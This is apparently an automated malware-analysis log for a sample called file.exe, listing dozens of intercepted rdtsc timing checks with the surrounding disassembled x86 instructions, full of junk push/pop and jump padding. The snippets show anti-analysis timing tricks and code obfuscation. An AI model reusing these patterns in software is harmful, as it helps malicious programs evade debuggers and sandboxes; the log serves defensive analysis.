Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76295B second address: 762975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762AB8 second address: 762ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7630FA second address: 76311A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F36EC8543DCh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76311A second address: 76311F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76311F second address: 763132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F36EC8543C6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762620 second address: 762625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762625 second address: 762644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F36EC8543D2h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762644 second address: 762648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762648 second address: 76264C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76342C second address: 763432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763432 second address: 76344D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76344D second address: 763459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763459 second address: 763474 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36EC8543CEh 0x00000008 pop edi 0x00000009 pushad 0x0000000a jnp 00007F36EC8543C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763474 second address: 763491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F36ED361E14h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763491 second address: 763497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763497 second address: 76349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76349B second address: 76349F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763628 second address: 76362E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76362E second address: 763637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763637 second address: 763641 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763641 second address: 76366D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36EC8543D5h 0x0000000d jmp 00007F36EC8543CFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BF02 second address: 76BF07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AA06 second address: 76AA40 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36EC8543C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F36EC8543CDh 0x00000012 pop esi 0x00000013 jmp 00007F36EC8543D2h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F36EC8543CEh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AA40 second address: 76AA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007F36ED361E06h 0x0000000b jmp 00007F36ED361E0Ah 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AD10 second address: 76AD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AE54 second address: 76AE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AE58 second address: 76AE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AFD7 second address: 76AFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F36ED361E06h 0x00000009 jmp 00007F36ED361E0Bh 0x0000000e jg 00007F36ED361E06h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76AFFC second address: 76B004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B162 second address: 76B16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B42C second address: 76B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B43C second address: 76B455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B455 second address: 76B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B45B second address: 76B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B5F1 second address: 76B5F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B792 second address: 76B7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36ED361E14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36ED361E19h 0x00000012 jmp 00007F36ED361E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B929 second address: 76B939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36EC8543CAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B939 second address: 76B943 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B943 second address: 76B949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B949 second address: 76B951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B951 second address: 76B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B955 second address: 76B959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B959 second address: 76B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B966 second address: 76B98B instructions: 0x00000000 rdtsc 0x00000002 je 00007F36ED361E06h 0x00000008 jnp 00007F36ED361E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F36ED361E11h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76B98B second address: 76B99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130B1 second address: 7130B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130B7 second address: 7130C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7130C1 second address: 7130CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BD59 second address: 76BD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76BD6D second address: 76BD7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36ED361E0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A581 second address: 76A595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jg 00007F36EC8543CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76A595 second address: 76A5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jnc 00007F36ED361E06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F47F second address: 76F48F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F36EC8543C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F48F second address: 76F493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773615 second address: 77361C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E087 second address: 7125D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36ED361E11h 0x0000000c popad 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D28E6h], ecx 0x00000014 lea eax, dword ptr [ebp+1247FDE3h] 0x0000001a call 00007F36ED361E0Ch 0x0000001f add ecx, 08F64C78h 0x00000025 pop edx 0x00000026 nop 0x00000027 push ecx 0x00000028 jmp 00007F36ED361E13h 0x0000002d pop ecx 0x0000002e push eax 0x0000002f jmp 00007F36ED361E0Fh 0x00000034 nop 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F36ED361E08h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ecx, dword ptr [ebp+122D2C27h] 0x00000055 call dword ptr [ebp+122DB66Ch] 0x0000005b jg 00007F36ED361E36h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E2C2 second address: 72E2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E715 second address: 72E732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E732 second address: 72E739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E739 second address: 72E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007F36ED361E0Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 je 00007F36ED361E06h 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72E759 second address: 72E78E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c jmp 00007F36EC8543CAh 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jng 00007F36EC8543CCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EB9F second address: 72EBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007F36ED361E0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F275 second address: 72F28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F36EC8543C8h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F28F second address: 72F2BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36ED361E08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push esi 0x0000000f jmp 00007F36ED361E10h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F36ED361E06h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F305 second address: 72F352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 je 00007F36EC8543DAh 0x0000000c jmp 00007F36EC8543D4h 0x00000011 nop 0x00000012 ja 00007F36EC8543D1h 0x00000018 jmp 00007F36EC8543CBh 0x0000001d lea eax, dword ptr [ebp+1247FE27h] 0x00000023 mov ecx, dword ptr [ebp+122D2B2Bh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jng 00007F36EC8543CCh 0x00000032 jp 00007F36EC8543C6h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F352 second address: 72F3CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36ED361E11h 0x00000008 jmp 00007F36ED361E0Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F36ED361E08h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D1B58h], esi 0x00000032 lea eax, dword ptr [ebp+1247FDE3h] 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F36ED361E08h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov dword ptr [ebp+12455BACh], edx 0x00000058 jnl 00007F36ED361E09h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F3CB second address: 72F3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F3D0 second address: 7130B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c clc 0x0000000d call dword ptr [ebp+1244BFAEh] 0x00000013 pushad 0x00000014 pushad 0x00000015 ja 00007F36ED361E06h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772B7A second address: 772B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772CE9 second address: 772CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772E4D second address: 772E53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772E53 second address: 772E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772FCE second address: 772FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 775625 second address: 775629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F15 second address: 777F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D0h 0x00000009 jnl 00007F36EC8543C6h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F36EC8543D6h 0x00000019 jmp 00007F36EC8543D8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F61 second address: 777F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F67 second address: 777F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 777F6B second address: 777FBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E17h 0x00000007 jo 00007F36ED361E06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F36ED361E14h 0x00000016 jmp 00007F36ED361E19h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 778242 second address: 77824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77824D second address: 778251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4A9 second address: 77C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F36EC8543C6h 0x0000000c jc 00007F36EC8543C6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C4C2 second address: 77C4C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C912 second address: 77C922 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36EC8543C6h 0x00000008 jg 00007F36EC8543C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA8A second address: 77CA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA94 second address: 77CA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA98 second address: 77CAAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAAA second address: 77CAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAB1 second address: 77CAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAB7 second address: 77CABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77FD41 second address: 77FD55 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F36ED361E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77FD55 second address: 77FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
